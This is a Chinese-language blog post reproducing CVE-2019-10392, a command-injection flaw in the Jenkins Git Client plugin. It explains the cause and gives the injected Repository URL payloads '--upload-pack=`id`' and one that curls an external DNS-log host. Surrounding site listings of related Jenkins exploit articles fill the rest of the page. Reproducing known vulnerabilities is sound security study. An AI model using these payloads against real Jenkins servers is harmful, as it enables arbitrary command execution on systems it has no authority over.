漏洞复现----1、Jenkins Git Client插件命令执行漏洞(CVE-2019-10392)

已于 2022-05-30 15:24:59 修改
阅读量2.4k 收藏 2
点赞数
分类专栏: # 漏洞复现 网络安全技术 文章标签: CVE-2019-10392
于 2021-12-02 15:31:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/117745553
版权

文章目录

一、Jenkins简介

Jenkins是一个独立的开源自动化服务器,由JAVA开发。
可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。
Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。
在很多中大型金融企业中普遍使用Jenkins来作为项目发布工具。

Jenkins服务安全加固

Jenkins特点:
开源免费,多平台支持(windows/linux/macos);
主从分布式架构;
提供web可视化配置管理页面;
安装配置简单、插件资源丰富.

二、漏洞简介

Git Client插件为Jenkins插件提供了git应用程序编程接口(API)。 它可以获取,签出,分支,列表,合并和标记存储库。Git Client接口提供git访问的主要入口点,它支持Jenkins凭据插件提供的用户名/密码凭据和私钥凭证。

该漏洞源于Git客户端插件接受用户指定的值作为调用git ls-remote的参数,以验证指定URL处是否存在Git存储库。 这是以允许具有Job/Configure权限的攻击者在Jenkins主服务器上执行任意系统命令作为Jenkins进程正在运行的OS用户的方式实现的。由于接收用户输入Repository URL而没有做过滤,导致了与git ls-remote命令拼接,执行了用户可控的命令。

影响版本
Git client Plugin <= 2.8.4

三、漏洞复现

登录后,创建一个新任务。构造一个自由风格的项目,然后点击确认提交。
在这里插入图片描述

在源码管理处选择git,然后在Repositories功能的Repository URL插入我们payload,将要执行的命令包含在upload-pack选项中。

--upload-pack=`id`  //反引号

在这里插入图片描述

--upload-pack=`curl 4y6heb.dnslog.cn`

在这里插入图片描述

在这里插入图片描述

参考链接:
https://mp.weixin.qq.com/s/Axx7KYm9irAQv7ZIO8autg

李沉肩
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jenkins漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-13 1564
jenkins漏洞概述,Jenkins是一个开源软件项目,它是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 3月9日,启明星辰VSRC监测到Jenkins官方发布安全公告,修复了Jenkins Server和Update Center中发现的2个跨站脚本漏洞CVE-2023-27898和CVE-2023-27905,统称为“CorePlague”)。未经身份验证的威胁者可利用这些漏洞在受害者的 Jenkins Server上执
客户端插件_CVE-2019-10392Jenkins Git client插件RCE复现
weixin_39771260的博客
01-01 205
0x00 简介Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。0x01 漏洞概述Git客户端插件中的系统命令执行漏洞,这是以允许具有Job/Configure权限的攻击者在Jenkins主服务器上执行任意系统命令作为Jenkins进程正在运行的OS用户的方式实现命令执行。0x02 影响范围Gi...
Jenkins未授权访问漏洞
最新发布
qq_68186313的博客
08-04 344
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。二:在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令。一、使用以下fofa语法进行产品搜索。Jenkins未授权访问漏洞
Git漏洞允许任意代码执行(CVE-2018-17456)复现
weixin_30405421的博客
10-23 459
Git漏洞允许任意代码执行(CVE-2018-17456) 国外安全研究员 joernchen 在 9 月 23 日向 git 官方报告了漏洞的相关细节。10月5日,Git项目披露了一个漏洞,编号为CVE-2018-17456。当用户克隆恶意存储库时,该漏洞可能会导致执行任意代码。 漏洞描述 这个漏洞已被分配 CVE-2018-17456 这个唯一 ID,与之前的 CVE-2017-10001...
Jenkins plugin manager 存在存储型XSS漏洞CVE-2023-27898)
murphysec的博客
03-15 876
Jenkins是一款Java编写的集成工具。 该项目受影响版本存在存储型XSS漏洞。该漏洞是由于在呈现插件版本与Jenkins plugin manager版本不兼容的错误信息时没有进行转义。 攻击者可向Jenkins实例中配置的更新站点提供插件,当Jenkins实例加载插件时,错误信息处的JavaScript代码便会被浏览器执行
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)
黑白的博客
12-07 1471
声明 好好学习,天天向上 漏洞描述 该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中。Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 复现过程 这里使用2.46.1版本 使用vulhub cd /app/vulhub-master/jenkins/CVE-2017-1000353/
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)1
08-04
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)Jenkins Git client插件命令执行漏洞(CVE-2019-10
git-client-plugin:Jenkins git客户端插件
03-10
git客户端插件Jenkins插件提供了git应用程序编程接口(API)。 它可以获取,签出,分支,列出,合并和标记存储库。 有关特定的API详细信息,请参阅。 提供了git访问的主要入口点。 它支持使用HTTP和HTTPS协议...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-... 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
Jenkins-PreAuth-RCE 漏洞详解】 Jenkins 是一款广泛应用的持续集成工具,用于自动化各种软件构建、测试和部署任务。在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码...
Jenkins RCE 漏洞CVE-2019-1003000) 复现
玄道的网安博客
09-24 3486
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
开源自动化服务器软件 Jenkins 被曝严重漏洞,可泄露敏感信息
smellycat000的专栏
08-19 871
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本周一,热门开源自动化服务器软件Jenkins发布安全公告称,Jetty web服务器中存在一个严重漏洞,可导致内存损...
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 565
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是
jenkins漏洞集合
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-23 363
Jenkins 是基于 Java 开发的开源软件项目,主要用于 CI (持续集成)、项目管理等。JenkinsJenkins开源的一个应用软件。一个开源自动化服务器Jenkins提供了数百个插件来支持构建,部署和自动化任何项目。jenkins漏洞集合汇总如下:
jenkins2.289.1版本远程命令执行漏洞
山兔的博客
11-13 2978
在网络安全行业中,有一种方法可以识别、定义和编目公开披露的漏洞。这种类型的标识称为CVE,代表常见漏洞和披露。分析后,为每个漏洞分配一个严重等级,称为 CVSS 分数,范围从 0 到 10,其中 0 表示信息,10 表示严重。这些分数取决于几个因素,其中一些是 CIA 的危害级别(机密性、完整性、可用性)、攻击复杂程度、攻击面的大小等。在计算机安全中,任意代码执行 (ACE) 是攻击者在目标计算机或目标进程中执行任意命令或代码的能力。[…]旨在利用此类漏洞的程序称为任意代码执行漏洞
Jenkins 披露插件中未修复的XSS、CSRF等18个0day漏洞
smellycat000的专栏
08-04 871
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开源 DevOps 平台 Jenkins 提醒用户,注意十几款插件中的未修复漏洞Jenkins 是领先的开源自动化服务器,提供数千个插件支持、部署和自动化项目。Jenkins 最新安全公告列出27个插件漏洞,其中5个漏洞为高危漏洞,这些漏洞多数并未修复。五个严重漏洞在这五个高危漏洞中,第一个是位于 Coverity 插...
Jenkins】未授权访问漏洞
qq_50854662的博客
07-08 1835
Jenkins】未授权访问漏洞
一款Jenkins的综合漏洞利用工具-JenkinsExploit-GUI
siu~
03-15 1847
一款Jenkins的综合漏洞利用工具
Jenkins Git client插件CVE-2019-10392命令执行漏洞分析
Jenkins Git client插件命令执行漏洞(CVE-2019-10392) Jenkins Git client插件是一个广泛使用的工具,它允许JenkinsGit版本控制系统进行交互,以便在持续集成和持续部署流程中自动获取代码仓库的更新。然而,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值